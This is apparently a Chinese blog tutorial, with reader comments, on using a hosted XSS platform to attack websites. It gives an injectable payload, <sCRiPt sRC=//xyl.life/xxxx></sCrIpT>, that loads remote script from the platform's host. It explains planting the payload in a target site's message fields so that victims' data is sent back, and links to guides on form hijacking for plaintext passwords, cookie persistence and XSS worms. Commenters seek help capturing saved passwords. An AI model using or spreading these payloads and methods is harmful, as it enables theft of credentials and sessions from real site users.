Xss平台详细使用教程

【注意:此文章为博主原创文章!转载需注意,请带原文链接,至少也要是txt格式!】
请仔细查看本文,相信你讲对XSS平台有另类的了解,注意是【仔细查看本文】!!!
首先登录XSS平台,进入 Xss平台之后是如下界面。 (以下所有图片点击都可以查看大图或原图)。
登录进去后,首先要创建一个项目。这个项目主要是为了标记你想测试某个网站。如下图:
点击创建项目之后如下图:
然后点击下一步。然后配置项目:
这里不要太多模块都勾选,非常非常容易导致JS报错,如果报错,那么可能你就收不到对方的中招信息了。尽量只勾选一个或两个。
然后点击下一步,就完成了。完成后如下图:
这里说明一下,注意上方的红框,这里最好是复制上方第一个红色方框中的内容,例如:
<sCRiPt sRC=//xyl.life/xxxx></sCrIpT> 这个就是项目给你的代码,这里说一下你需要测试的网站是https的网站且你的XSS平台也支持https那么你可以把这个代码改成 <sCRiPt sRC=https://xyl.life/xxxx></sCrIpT> 这样。
这里还要说明一下,其实 <sCRiPt sRC=//xyl.life/xxxx></sCrIpT> 当网站前面是//的时候,代码会自动适配网站,如果对方网站是https的那么代码会自动从https加载,如果对方网站是http的那么代码会从http加载。所以,,,默认的这种方式是最好的插入方式。(xss平台不需要支持https,xss项目代码支持https就好,这句话自行理解)
如何从其他地方查看上面的项目代码呢?如下图:
至此最基本的XSS平台项目及使用方法建立完毕了,剩下就是拿你自己的项目代码来做测试喽。例如上面我项目对应的代码是:<sCRiPt sRC=//xsspt.com/xxxx></sCrIpT>
假设我想测试留言的地方就可以如下图:
然后如果对方中招了,那么你的XSS平台就会有收到对方的信息。好了,这是最基本的使用方法。
下面是本人整理的一些XSS平台进阶的使用方法:
图片XSS 获取对方后台 使用讲解 https://woj.app/1785.html
XSS 之 form表单劫持(通用明文记录) https://woj.app/1684.html (这里推荐使用平台最新表单劫持插件,无需设置,直接可用)
xss获取后台二级密码 – URL跳转 (地址栏不变) https://woj.app/1820.html
后台(内网)打穿神器→xss蠕虫 https://woj.app/2173.html
xss平台持久cookie说明 keepsession说明 https://woj.app/1907.html
不用cookie 一个储存XSS对“某btc平台”攻城略地 https://woj.app/3035.html
--------------------------XSS经典案例之一----------------------
百度搜索框反射XSS分析 (2015年案例) https://woj.app/2089.html
一波三折之某站点反射XSS (绕WAF防御) https://woj.app/1603.html
京东驳回的一枚轻易paylod而不易exploit的xss的开发过程 https://woj.app/1590.html
网络上免费XSS平台集合:https://sec.ly.com/xsspt.txt 这里全部都是网络上公开的,不公开的,免费的收费的XSS平台集合,任君选择。
https://woj.app/liuyan/
可以注册个帐号吗 想多学习学习
你的收费版XSS平台源码怎么卖?加我QQ卖我个研究下,发你邮件你也没有回我
程序不卖的 有免费版本。。。
您好,搭建好平台后输入默认的用户名与密码,显示错误,怎么回事?
您好,搭建好平台后输入默认的用户名(admin)与密码(1234567),显示”登录失败,请检查用户名/邮箱或密码”,怎么回事?
老哥,我不能keepsession了,最开始的几个任务删除了,现在就一个任务
收到邮件提醒了,但是看不到内容
大佬,给个邀请码呗(eHNzMGRheUBwcm90b25tYWlsLmNo)。
不好意思,邀请码只能有偿给土司论坛的朋友,而且朋友你留的还是匿名邮箱。。。。。。可以说很社会。
那啥,你这套程序能给我一哈不,我要里头的那些xss脚本..嘻嘻.
老哥,平台搭好了以后显示500,本地搭也是白页,试过切换php版本。也不行。
想问最新劫持表单,不清除缓存只能接收到一次消息,还有获取浏览器记住的明文密码,这个怎么填写type1 2 ,id1 2 , name1 2,这个是否可以接收到input的文本内容呢?麻烦大佬给回信息或者私聊给个联系方式